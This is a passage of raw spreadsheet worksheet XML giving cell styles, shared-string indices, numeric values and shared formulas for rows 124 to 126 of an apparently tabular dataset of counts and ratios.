      <c r="LN124" s="127"/>
      <c r="LO124" s="127"/>
      <c r="LP124" s="127"/>
      <c r="LQ124" s="127"/>
      <c r="LR124" s="127"/>
      <c r="LS124" s="127"/>
      <c r="LT124" s="127"/>
      <c r="LU124" s="127"/>
      <c r="LV124" s="127"/>
      <c r="LW124" s="127"/>
      <c r="LX124" s="127"/>
      <c r="LY124" s="127"/>
      <c r="LZ124" s="127"/>
      <c r="MA124" s="127"/>
      <c r="MB124" s="127"/>
      <c r="MC124" s="127"/>
      <c r="MD124" s="127"/>
      <c r="ME124" s="127"/>
      <c r="MF124" s="127"/>
      <c r="MG124" s="127"/>
      <c r="MH124" s="127"/>
      <c r="MI124" s="127"/>
      <c r="MJ124" s="127"/>
      <c r="MK124" s="127"/>
      <c r="ML124" s="127"/>
      <c r="MM124" s="127"/>
      <c r="MN124" s="127"/>
      <c r="MO124" s="127"/>
      <c r="MP124" s="127"/>
      <c r="MQ124" s="127"/>
      <c r="MR124" s="127"/>
      <c r="MS124" s="127"/>
      <c r="MT124" s="127"/>
      <c r="MU124" s="127"/>
      <c r="MV124" s="127"/>
      <c r="MW124" s="127"/>
      <c r="MX124" s="127"/>
      <c r="MY124" s="127"/>
      <c r="MZ124" s="127"/>
      <c r="NA124" s="127"/>
      <c r="NB124" s="127"/>
      <c r="NC124" s="127"/>
      <c r="ND124" s="127"/>
      <c r="NE124" s="127"/>
      <c r="NF124" s="127"/>
      <c r="NG124" s="127"/>
      <c r="NH124" s="127"/>
      <c r="NI124" s="127"/>
      <c r="NJ124" s="127"/>
      <c r="NK124" s="127"/>
      <c r="NL124" s="127"/>
      <c r="NM124" s="127"/>
      <c r="NN124" s="127"/>
      <c r="NO124" s="127"/>
      <c r="NP124" s="127"/>
      <c r="NQ124" s="127"/>
      <c r="NR124" s="127"/>
      <c r="NS124" s="127"/>
      <c r="NT124" s="127"/>
      <c r="NU124" s="127"/>
      <c r="NV124" s="127"/>
      <c r="NW124" s="127"/>
      <c r="NX124" s="127"/>
      <c r="NY124" s="127"/>
    </row>
    <row r="125" ht="153.75" customHeight="1">
      <c r="B125" s="89" t="s">
        <v>2093</v>
      </c>
      <c r="C125" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D125" s="90" t="s">
        <v>2094</v>
      </c>
      <c r="E125" s="90" t="s">
        <v>2108</v>
      </c>
      <c r="F125" s="90" t="s">
        <v>2109</v>
      </c>
      <c r="G125" s="90" t="s">
        <v>2110</v>
      </c>
      <c r="H125" s="90" t="s">
        <v>2111</v>
      </c>
      <c r="I125" s="92" t="s">
        <v>2112</v>
      </c>
      <c r="J125" s="92" t="s">
        <v>315</v>
      </c>
      <c r="K125" s="92" t="s">
        <v>2113</v>
      </c>
      <c r="L125" s="93" t="s">
        <v>317</v>
      </c>
      <c r="M125" s="93">
        <v>2058.0</v>
      </c>
      <c r="N125" s="93">
        <v>2049.0</v>
      </c>
      <c r="O125" s="93">
        <v>0.0</v>
      </c>
      <c r="P125" s="93">
        <v>2060.0</v>
      </c>
      <c r="Q125" s="93">
        <f t="shared" si="204"/>
        <v>2060</v>
      </c>
      <c r="R125" s="93">
        <v>2060.0</v>
      </c>
      <c r="S125" s="93">
        <v>0.0</v>
      </c>
      <c r="T125" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U125" s="95" t="s">
        <v>224</v>
      </c>
      <c r="V125" s="126" t="s">
        <v>2114</v>
      </c>
      <c r="W125" s="96" t="s">
        <v>2115</v>
      </c>
      <c r="X125" s="97" t="s">
        <v>2116</v>
      </c>
      <c r="Y125" s="126" t="s">
        <v>2117</v>
      </c>
      <c r="Z125" s="96" t="s">
        <v>2118</v>
      </c>
      <c r="AA125" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB125" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC125" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD125" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE125" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF125" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG125" s="98" t="s">
        <v>226</v>
      </c>
      <c r="AH125" s="99" t="s">
        <v>2119</v>
      </c>
      <c r="AI125" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ125" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AK125" s="100" t="s">
        <v>323</v>
      </c>
      <c r="AL125" s="100">
        <v>2.0</v>
      </c>
      <c r="AM125" s="100">
        <v>4.0</v>
      </c>
      <c r="AN125" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO125" s="100" t="s">
        <v>323</v>
      </c>
      <c r="AP125" s="100">
        <v>2.0</v>
      </c>
      <c r="AQ125" s="100">
        <v>4.0</v>
      </c>
      <c r="AR125" s="100" t="s">
        <v>323</v>
      </c>
      <c r="AS125" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT125" s="100" t="str">
        <f t="shared" si="205"/>
        <v>1421, 1418</v>
      </c>
      <c r="AU125" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV125" s="100" t="s">
        <v>323</v>
      </c>
      <c r="AW125" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX125" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY125" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ125" s="100">
        <v>0.0</v>
      </c>
      <c r="BA125" s="102">
        <v>2058.0</v>
      </c>
      <c r="BB125" s="102">
        <v>4.0</v>
      </c>
      <c r="BC125" s="102">
        <v>4.0</v>
      </c>
      <c r="BD125" s="102">
        <v>4.0</v>
      </c>
      <c r="BE125" s="102">
        <v>0.0</v>
      </c>
      <c r="BF125" s="102">
        <v>0.0</v>
      </c>
      <c r="BG125" s="102">
        <v>0.0</v>
      </c>
      <c r="BH125" s="102">
        <v>0.0</v>
      </c>
      <c r="BI125" s="102">
        <v>4.0</v>
      </c>
      <c r="BJ125" s="102">
        <v>4.0</v>
      </c>
      <c r="BK125" s="102">
        <v>4.0</v>
      </c>
      <c r="BL125" s="103">
        <f t="shared" si="167"/>
        <v>0.001952171791</v>
      </c>
      <c r="BM125" s="103">
        <f t="shared" si="168"/>
        <v>0.001952171791</v>
      </c>
      <c r="BN125" s="103">
        <f t="shared" si="169"/>
        <v>0</v>
      </c>
      <c r="BO125" s="103">
        <f t="shared" si="170"/>
        <v>0.001941747573</v>
      </c>
      <c r="BP125" s="103">
        <f t="shared" si="171"/>
        <v>0.001941747573</v>
      </c>
      <c r="BQ125" s="103">
        <f t="shared" si="172"/>
        <v>0</v>
      </c>
      <c r="BR125" s="103">
        <f t="shared" si="173"/>
        <v>0.001941747573</v>
      </c>
      <c r="BS125" s="103">
        <f t="shared" si="174"/>
        <v>0.001941747573</v>
      </c>
      <c r="BT125" s="103">
        <f t="shared" si="175"/>
        <v>0</v>
      </c>
      <c r="BU125" s="103">
        <f t="shared" si="206"/>
        <v>0</v>
      </c>
      <c r="BV125" s="103">
        <f t="shared" si="207"/>
        <v>0</v>
      </c>
      <c r="BW125" s="104" t="s">
        <v>2120</v>
      </c>
      <c r="BX125" s="104">
        <v>15.0</v>
      </c>
      <c r="BY125" s="104">
        <v>40.0</v>
      </c>
      <c r="BZ125" s="101" t="s">
        <v>2121</v>
      </c>
      <c r="CA125" s="104" t="s">
        <v>2122</v>
      </c>
      <c r="CB125" s="104">
        <v>11.0</v>
      </c>
      <c r="CC125" s="104">
        <v>33.0</v>
      </c>
      <c r="CD125" s="104" t="s">
        <v>2123</v>
      </c>
      <c r="CE125" s="104" t="s">
        <v>2121</v>
      </c>
      <c r="CF125" s="104" t="str">
        <f t="shared" si="203"/>
        <v>2013409, 2034730, 2034718</v>
      </c>
      <c r="CG125" s="104" t="s">
        <v>2123</v>
      </c>
      <c r="CH125" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CI125" s="104" t="s">
        <v>2124</v>
      </c>
      <c r="CJ125" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK125" s="104">
        <v>8.0</v>
      </c>
      <c r="CL125" s="104">
        <v>33.0</v>
      </c>
      <c r="CM125" s="105">
        <v>2057.0</v>
      </c>
      <c r="CN125" s="105">
        <v>29.0</v>
      </c>
      <c r="CO125" s="105">
        <v>30.0</v>
      </c>
      <c r="CP125" s="105">
        <v>4.0</v>
      </c>
      <c r="CQ125" s="105">
        <v>36.0</v>
      </c>
      <c r="CR125" s="105">
        <v>30.0</v>
      </c>
      <c r="CS125" s="105">
        <v>22.0</v>
      </c>
      <c r="CT125" s="105">
        <v>0.0</v>
      </c>
      <c r="CU125" s="105">
        <v>23.0</v>
      </c>
      <c r="CV125" s="105">
        <v>23.0</v>
      </c>
      <c r="CW125" s="105">
        <v>23.0</v>
      </c>
      <c r="CX125" s="105">
        <v>23.0</v>
      </c>
      <c r="CY125" s="105">
        <v>4.0</v>
      </c>
      <c r="CZ125" s="105">
        <v>29.0</v>
      </c>
      <c r="DA125" s="105">
        <v>23.0</v>
      </c>
      <c r="DB125" s="106">
        <f t="shared" si="176"/>
        <v>0.01415324549</v>
      </c>
      <c r="DC125" s="106">
        <f t="shared" si="177"/>
        <v>0.0112249878</v>
      </c>
      <c r="DD125" s="106">
        <f t="shared" si="178"/>
        <v>0.01073694485</v>
      </c>
      <c r="DE125" s="106">
        <f t="shared" si="179"/>
        <v>0.0145631068</v>
      </c>
      <c r="DF125" s="106">
        <f t="shared" si="180"/>
        <v>0.01116504854</v>
      </c>
      <c r="DG125" s="106">
        <f t="shared" si="20"/>
        <v>0.01116504854</v>
      </c>
      <c r="DH125" s="106">
        <f t="shared" si="181"/>
        <v>0.0145631068</v>
      </c>
      <c r="DI125" s="106">
        <f t="shared" si="182"/>
        <v>0.01116504854</v>
      </c>
      <c r="DJ125" s="106">
        <f t="shared" si="183"/>
        <v>0.01116504854</v>
      </c>
      <c r="DK125" s="107">
        <f t="shared" si="208"/>
        <v>0.01073694485</v>
      </c>
      <c r="DL125" s="106">
        <f t="shared" si="209"/>
        <v>1</v>
      </c>
      <c r="DM125" s="108" t="s">
        <v>2125</v>
      </c>
      <c r="DN125" s="108">
        <v>22.0</v>
      </c>
      <c r="DO125" s="108">
        <v>66.0</v>
      </c>
      <c r="DP125" s="101" t="s">
        <v>546</v>
      </c>
      <c r="DQ125" s="108" t="s">
        <v>2126</v>
      </c>
      <c r="DR125" s="108">
        <v>18.0</v>
      </c>
      <c r="DS125" s="108">
        <v>59.0</v>
      </c>
      <c r="DT125" s="108" t="s">
        <v>2127</v>
      </c>
      <c r="DU125" s="108" t="s">
        <v>546</v>
      </c>
      <c r="DV125" s="108" t="str">
        <f t="shared" si="166"/>
        <v>49040, 2013409, 2034730, 2034718, 44484, 44485, 44487, 44489, 50447, 41807, 1418, 1421</v>
      </c>
      <c r="DW125" s="108" t="s">
        <v>2128</v>
      </c>
      <c r="DX125" s="108" t="s">
        <v>2129</v>
      </c>
      <c r="DY125" s="108" t="s">
        <v>2130</v>
      </c>
      <c r="DZ125" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA125" s="108">
        <v>10.0</v>
      </c>
      <c r="EB125" s="108">
        <v>33.0</v>
      </c>
      <c r="EC125" s="109">
        <v>2058.0</v>
      </c>
      <c r="ED125" s="109">
        <v>31.0</v>
      </c>
      <c r="EE125" s="109">
        <v>33.0</v>
      </c>
      <c r="EF125" s="109">
        <v>30.0</v>
      </c>
      <c r="EG125" s="109">
        <v>36.0</v>
      </c>
      <c r="EH125" s="109">
        <v>32.0</v>
      </c>
      <c r="EI125" s="109">
        <v>22.0</v>
      </c>
      <c r="EJ125" s="109">
        <v>0.0</v>
      </c>
      <c r="EK125" s="109">
        <v>23.0</v>
      </c>
      <c r="EL125" s="109">
        <v>23.0</v>
      </c>
      <c r="EM125" s="109">
        <v>25.0</v>
      </c>
      <c r="EN125" s="109">
        <v>26.0</v>
      </c>
      <c r="EO125" s="109">
        <v>30.0</v>
      </c>
      <c r="EP125" s="109">
        <v>29.0</v>
      </c>
      <c r="EQ125" s="109">
        <v>25.0</v>
      </c>
      <c r="ER125" s="110">
        <f t="shared" si="184"/>
        <v>0.01512933138</v>
      </c>
      <c r="ES125" s="110">
        <f t="shared" si="185"/>
        <v>0.01220107369</v>
      </c>
      <c r="ET125" s="110">
        <f t="shared" si="186"/>
        <v>0.01073694485</v>
      </c>
      <c r="EU125" s="110">
        <f t="shared" si="187"/>
        <v>0.01601941748</v>
      </c>
      <c r="EV125" s="110">
        <f t="shared" si="188"/>
        <v>0.01262135922</v>
      </c>
      <c r="EW125" s="110">
        <f t="shared" si="189"/>
        <v>0.01116504854</v>
      </c>
      <c r="EX125" s="110">
        <f t="shared" si="190"/>
        <v>0.01553398058</v>
      </c>
      <c r="EY125" s="110">
        <f t="shared" si="191"/>
        <v>0.01213592233</v>
      </c>
      <c r="EZ125" s="110">
        <f t="shared" si="192"/>
        <v>0.01116504854</v>
      </c>
      <c r="FA125" s="110">
        <f t="shared" si="210"/>
        <v>0.01073694485</v>
      </c>
      <c r="FB125" s="110">
        <f t="shared" si="211"/>
        <v>1</v>
      </c>
      <c r="FC125" s="111" t="s">
        <v>2131</v>
      </c>
      <c r="FD125" s="111">
        <v>31.0</v>
      </c>
      <c r="FE125" s="111">
        <v>90.0</v>
      </c>
      <c r="FF125" s="101" t="s">
        <v>2132</v>
      </c>
      <c r="FG125" s="111" t="s">
        <v>2133</v>
      </c>
      <c r="FH125" s="111">
        <v>23.0</v>
      </c>
      <c r="FI125" s="111">
        <v>33.0</v>
      </c>
      <c r="FJ125" s="111" t="s">
        <v>2134</v>
      </c>
      <c r="FK125" s="111" t="s">
        <v>2132</v>
      </c>
      <c r="FL125" s="111" t="str">
        <f t="shared" si="155"/>
        <v>49040, 2013409, 2034730, 2034718, 2003099, 2007571, 2100615, 44484, 44485, 44487, 44489, 50447, 2002749, 2002752, 2006408, 2100472, 2101418, 41807</v>
      </c>
      <c r="FM125" s="111" t="s">
        <v>2135</v>
      </c>
      <c r="FN125" s="111" t="s">
        <v>2136</v>
      </c>
      <c r="FO125" s="111" t="s">
        <v>2137</v>
      </c>
      <c r="FP125" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ125" s="111">
        <v>14.0</v>
      </c>
      <c r="FR125" s="111">
        <v>33.0</v>
      </c>
      <c r="FS125" s="112">
        <v>2057.0</v>
      </c>
      <c r="FT125" s="112">
        <v>41.0</v>
      </c>
      <c r="FU125" s="112">
        <v>46.0</v>
      </c>
      <c r="FV125" s="112">
        <v>30.0</v>
      </c>
      <c r="FW125" s="112">
        <v>60.0</v>
      </c>
      <c r="FX125" s="112">
        <v>51.0</v>
      </c>
      <c r="FY125" s="112">
        <v>22.0</v>
      </c>
      <c r="FZ125" s="112">
        <v>0.0</v>
      </c>
      <c r="GA125" s="112">
        <v>23.0</v>
      </c>
      <c r="GB125" s="112">
        <v>23.0</v>
      </c>
      <c r="GC125" s="112">
        <v>29.0</v>
      </c>
      <c r="GD125" s="112">
        <v>30.0</v>
      </c>
      <c r="GE125" s="112">
        <v>30.0</v>
      </c>
      <c r="GF125" s="112">
        <v>40.0</v>
      </c>
      <c r="GG125" s="112">
        <v>55.0</v>
      </c>
      <c r="GH125" s="113">
        <f t="shared" si="193"/>
        <v>0.02000976086</v>
      </c>
      <c r="GI125" s="113">
        <f t="shared" si="194"/>
        <v>0.01415324549</v>
      </c>
      <c r="GJ125" s="113">
        <f t="shared" si="195"/>
        <v>0.01073694485</v>
      </c>
      <c r="GK125" s="113">
        <f t="shared" si="196"/>
        <v>0.02233009709</v>
      </c>
      <c r="GL125" s="113">
        <f t="shared" si="197"/>
        <v>0.0145631068</v>
      </c>
      <c r="GM125" s="113">
        <f t="shared" si="198"/>
        <v>0.01116504854</v>
      </c>
      <c r="GN125" s="113">
        <f t="shared" si="199"/>
        <v>0.02475728155</v>
      </c>
      <c r="GO125" s="113">
        <f t="shared" si="200"/>
        <v>0.02669902913</v>
      </c>
      <c r="GP125" s="113">
        <f t="shared" si="201"/>
        <v>0.01116504854</v>
      </c>
      <c r="GQ125" s="114">
        <f t="shared" si="212"/>
        <v>0.01073694485</v>
      </c>
      <c r="GR125" s="113">
        <f t="shared" si="213"/>
        <v>1</v>
      </c>
      <c r="GS125" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT125" s="94" t="s">
        <v>2138</v>
      </c>
      <c r="GU125" s="116" t="s">
        <v>2139</v>
      </c>
      <c r="GV125" s="116">
        <v>2.0</v>
      </c>
      <c r="GW125" s="116">
        <v>19.0</v>
      </c>
      <c r="GX125" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY125" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ125" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA125" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB125" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC125" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD125" s="131" t="s">
        <v>2139</v>
      </c>
      <c r="HE125" s="131" t="s">
        <v>2139</v>
      </c>
      <c r="HF125" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG125" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH125" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI125" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ125" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK125" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL125" s="93">
        <v>2059.0</v>
      </c>
      <c r="HM125" s="93">
        <f t="shared" si="83"/>
        <v>19</v>
      </c>
      <c r="HN125" s="93">
        <v>19.0</v>
      </c>
      <c r="HO125" s="93">
        <v>0.0</v>
      </c>
      <c r="HP125" s="93">
        <v>19.0</v>
      </c>
      <c r="HQ125" s="118">
        <f t="shared" si="53"/>
        <v>0.009272816008</v>
      </c>
      <c r="HR125" s="118">
        <f t="shared" si="54"/>
        <v>0.009272816008</v>
      </c>
      <c r="HS125" s="118">
        <f t="shared" si="55"/>
        <v>1</v>
      </c>
      <c r="HT125" s="139" t="s">
        <v>2140</v>
      </c>
      <c r="HU125" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV125" s="119" t="s">
        <v>2141</v>
      </c>
      <c r="HW125" s="119">
        <v>7.0</v>
      </c>
      <c r="HX125" s="119">
        <v>33.0</v>
      </c>
      <c r="HY125" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ125" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA125" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB125" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC125" s="120" t="s">
        <v>2142</v>
      </c>
      <c r="ID125" s="120" t="s">
        <v>2143</v>
      </c>
      <c r="IE125" s="120">
        <v>9999.0</v>
      </c>
      <c r="IF125" s="120" t="s">
        <v>2144</v>
      </c>
      <c r="IG125" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH125" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II125" s="99" t="s">
        <v>12</v>
      </c>
      <c r="IJ125" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK125" s="99">
        <v>2056.0</v>
      </c>
      <c r="IL125" s="99">
        <v>16.0</v>
      </c>
      <c r="IM125" s="121">
        <f t="shared" si="159"/>
        <v>2049</v>
      </c>
      <c r="IN125" s="122" t="s">
        <v>2145</v>
      </c>
      <c r="IO125" s="98">
        <v>2049.0</v>
      </c>
      <c r="IP125" s="123">
        <f t="shared" si="58"/>
        <v>1</v>
      </c>
      <c r="IQ125" s="118">
        <f t="shared" si="59"/>
        <v>1</v>
      </c>
      <c r="IR125" s="118">
        <f t="shared" si="60"/>
        <v>1</v>
      </c>
      <c r="IS125" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT125" s="127"/>
      <c r="IU125" s="127"/>
      <c r="IV125" s="127"/>
      <c r="IW125" s="127"/>
      <c r="IX125" s="127"/>
      <c r="IY125" s="127"/>
      <c r="IZ125" s="127"/>
      <c r="JA125" s="127"/>
      <c r="JB125" s="127"/>
      <c r="JC125" s="127"/>
      <c r="JD125" s="127"/>
      <c r="JE125" s="127"/>
      <c r="JF125" s="127"/>
      <c r="JG125" s="127"/>
      <c r="JH125" s="127"/>
      <c r="JI125" s="127"/>
      <c r="JJ125" s="127"/>
      <c r="JK125" s="127"/>
      <c r="JL125" s="127"/>
      <c r="JM125" s="127"/>
      <c r="JN125" s="127"/>
      <c r="JO125" s="127"/>
      <c r="JP125" s="127"/>
      <c r="JQ125" s="127"/>
      <c r="JR125" s="127"/>
      <c r="JS125" s="127"/>
      <c r="JT125" s="127"/>
      <c r="JU125" s="127"/>
      <c r="JV125" s="127"/>
      <c r="JW125" s="127"/>
      <c r="JX125" s="127"/>
      <c r="JY125" s="127"/>
      <c r="JZ125" s="127"/>
      <c r="KA125" s="127"/>
      <c r="KB125" s="127"/>
      <c r="KC125" s="127"/>
      <c r="KD125" s="127"/>
      <c r="KE125" s="127"/>
      <c r="KF125" s="127"/>
      <c r="KG125" s="127"/>
      <c r="KH125" s="127"/>
      <c r="KI125" s="127"/>
      <c r="KJ125" s="127"/>
      <c r="KK125" s="127"/>
      <c r="KL125" s="127"/>
      <c r="KM125" s="127"/>
      <c r="KN125" s="127"/>
      <c r="KO125" s="127"/>
      <c r="KP125" s="127"/>
      <c r="KQ125" s="127"/>
      <c r="KR125" s="127"/>
      <c r="KS125" s="127"/>
      <c r="KT125" s="127"/>
      <c r="KU125" s="127"/>
      <c r="KV125" s="127"/>
      <c r="KW125" s="127"/>
      <c r="KX125" s="127"/>
      <c r="KY125" s="127"/>
      <c r="KZ125" s="127"/>
      <c r="LA125" s="127"/>
      <c r="LB125" s="127"/>
      <c r="LC125" s="127"/>
      <c r="LD125" s="127"/>
      <c r="LE125" s="127"/>
      <c r="LF125" s="127"/>
      <c r="LG125" s="127"/>
      <c r="LH125" s="127"/>
      <c r="LI125" s="127"/>
      <c r="LJ125" s="127"/>
      <c r="LK125" s="127"/>
      <c r="LL125" s="127"/>
      <c r="LM125" s="127"/>
      <c r="LN125" s="127"/>
      <c r="LO125" s="127"/>
      <c r="LP125" s="127"/>
      <c r="LQ125" s="127"/>
      <c r="LR125" s="127"/>
      <c r="LS125" s="127"/>
      <c r="LT125" s="127"/>
      <c r="LU125" s="127"/>
      <c r="LV125" s="127"/>
      <c r="LW125" s="127"/>
      <c r="LX125" s="127"/>
      <c r="LY125" s="127"/>
      <c r="LZ125" s="127"/>
      <c r="MA125" s="127"/>
      <c r="MB125" s="127"/>
      <c r="MC125" s="127"/>
      <c r="MD125" s="127"/>
      <c r="ME125" s="127"/>
      <c r="MF125" s="127"/>
      <c r="MG125" s="127"/>
      <c r="MH125" s="127"/>
      <c r="MI125" s="127"/>
      <c r="MJ125" s="127"/>
      <c r="MK125" s="127"/>
      <c r="ML125" s="127"/>
      <c r="MM125" s="127"/>
      <c r="MN125" s="127"/>
      <c r="MO125" s="127"/>
      <c r="MP125" s="127"/>
      <c r="MQ125" s="127"/>
      <c r="MR125" s="127"/>
      <c r="MS125" s="127"/>
      <c r="MT125" s="127"/>
      <c r="MU125" s="127"/>
      <c r="MV125" s="127"/>
      <c r="MW125" s="127"/>
      <c r="MX125" s="127"/>
      <c r="MY125" s="127"/>
      <c r="MZ125" s="127"/>
      <c r="NA125" s="127"/>
      <c r="NB125" s="127"/>
      <c r="NC125" s="127"/>
      <c r="ND125" s="127"/>
      <c r="NE125" s="127"/>
      <c r="NF125" s="127"/>
      <c r="NG125" s="127"/>
      <c r="NH125" s="127"/>
      <c r="NI125" s="127"/>
      <c r="NJ125" s="127"/>
      <c r="NK125" s="127"/>
      <c r="NL125" s="127"/>
      <c r="NM125" s="127"/>
      <c r="NN125" s="127"/>
      <c r="NO125" s="127"/>
      <c r="NP125" s="127"/>
      <c r="NQ125" s="127"/>
      <c r="NR125" s="127"/>
      <c r="NS125" s="127"/>
      <c r="NT125" s="127"/>
      <c r="NU125" s="127"/>
      <c r="NV125" s="127"/>
      <c r="NW125" s="127"/>
      <c r="NX125" s="127"/>
      <c r="NY125" s="127"/>
    </row>
    <row r="126" ht="153.75" customHeight="1">
      <c r="B126" s="89" t="s">
        <v>2093</v>
      </c>
      <c r="C126" s="91" t="s">
        <v>12</v>
      </c>
      <c r="D126" s="90" t="s">
        <v>2094</v>
      </c>
      <c r="E126" s="90" t="s">
        <v>2108</v>
      </c>
      <c r="F126" s="90" t="s">
        <v>2109</v>
      </c>
      <c r="G126" s="91" t="s">
        <v>2146</v>
      </c>
      <c r="H126" s="90" t="s">
        <v>2147</v>
      </c>
      <c r="I126" s="92" t="s">
        <v>2148</v>
      </c>
      <c r="J126" s="92" t="s">
        <v>2149</v>
      </c>
      <c r="K126" s="92" t="s">
        <v>2150</v>
      </c>
      <c r="L126" s="93" t="s">
        <v>375</v>
      </c>
      <c r="M126" s="93">
        <v>6951.0</v>
      </c>
      <c r="N126" s="93">
        <v>6950.0</v>
      </c>
      <c r="O126" s="93">
        <v>0.0</v>
      </c>
      <c r="P126" s="93">
        <v>6950.0</v>
      </c>
      <c r="Q126" s="93">
        <f t="shared" si="204"/>
        <v>6950</v>
      </c>
      <c r="R126" s="93">
        <v>6950.0</v>
      </c>
      <c r="S126" s="93">
        <v>0.0</v>
      </c>
      <c r="T126" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U126" s="95" t="s">
        <v>224</v>
      </c>
      <c r="V126" s="96" t="s">
        <v>2151</v>
      </c>
      <c r="W126" s="168" t="s">
        <v>2152</v>
      </c>
      <c r="X126" s="97" t="s">
        <v>2153</v>
      </c>
      <c r="Y126" s="126" t="s">
        <v>2154</v>
      </c>
      <c r="Z126" s="96" t="s">
        <v>2155</v>
      </c>
      <c r="AA126" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB126" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC126" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD126" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE126" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF126" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG126" s="98" t="s">
        <v>226</v>
      </c>
      <c r="AH126" s="99" t="s">
        <v>2156</v>
      </c>
      <c r="AI126" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ126" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AK126" s="100" t="s">
        <v>2085</v>
      </c>
      <c r="AL126" s="100">
        <v>44.0</v>
      </c>
      <c r="AM126" s="100">
        <v>3652.0</v>
      </c>
      <c r="AN126" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO126" s="100" t="s">
        <v>2085</v>
      </c>
      <c r="AP126" s="100">
        <v>44.0</v>
      </c>
      <c r="AQ126" s="100">
        <v>3652.0</v>
      </c>
      <c r="AR126" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AS126" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT126" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AU126" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV126" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AW126" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX126" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY126" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AZ126" s="100" t="s">
        <v>12</v>
      </c>
      <c r="BA126" s="102">
        <v>6951.0</v>
      </c>
      <c r="BB126" s="102">
        <v>0.0</v>
      </c>
      <c r="BC126" s="102">
        <v>1.0</v>
      </c>
      <c r="BD126" s="102">
        <v>9998.0</v>
      </c>
      <c r="BE126" s="102" t="s">
        <v>12</v>
      </c>
      <c r="BF126" s="102">
        <v>0.0</v>
      </c>
      <c r="BG126" s="102" t="s">
        <v>12</v>
      </c>
      <c r="BH126" s="102" t="s">
        <v>12</v>
      </c>
      <c r="BI126" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ126" s="102">
        <v>1.0</v>
      </c>
      <c r="BK126" s="102">
        <v>9998.0</v>
      </c>
      <c r="BL126" s="103">
        <f t="shared" si="167"/>
        <v>0</v>
      </c>
      <c r="BM126" s="103">
        <f t="shared" si="168"/>
        <v>0</v>
      </c>
      <c r="BN126" s="103" t="str">
        <f t="shared" si="169"/>
        <v>-</v>
      </c>
      <c r="BO126" s="103">
        <f t="shared" si="170"/>
        <v>0.0001438848921</v>
      </c>
      <c r="BP126" s="103">
        <f t="shared" si="171"/>
        <v>0.0001438848921</v>
      </c>
      <c r="BQ126" s="103" t="str">
        <f t="shared" si="172"/>
        <v>-</v>
      </c>
      <c r="BR126" s="103">
        <f t="shared" si="173"/>
        <v>1.438561151</v>
      </c>
      <c r="BS126" s="103">
        <f t="shared" si="174"/>
        <v>1.438561151</v>
      </c>
      <c r="BT126" s="103" t="str">
        <f t="shared" si="175"/>
        <v>-</v>
      </c>
      <c r="BU126" s="102" t="s">
        <v>12</v>
      </c>
      <c r="BV126" s="102" t="s">
        <v>12</v>
      </c>
      <c r="BW126" s="104" t="s">
        <v>2086</v>
      </c>
      <c r="BX126" s="104">
        <v>59.0</v>
      </c>
      <c r="BY126" s="104">
        <v>13650.0</v>
      </c>
      <c r="BZ126" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA126" s="104" t="s">
        <v>2086</v>
      </c>
      <c r="CB126" s="104">
        <v>59.0</v>
      </c>
      <c r="CC126" s="104">
        <v>13650.0</v>
      </c>
      <c r="CD126" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CE126" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF126" s="104" t="s">
        <v>12</v>
      </c>
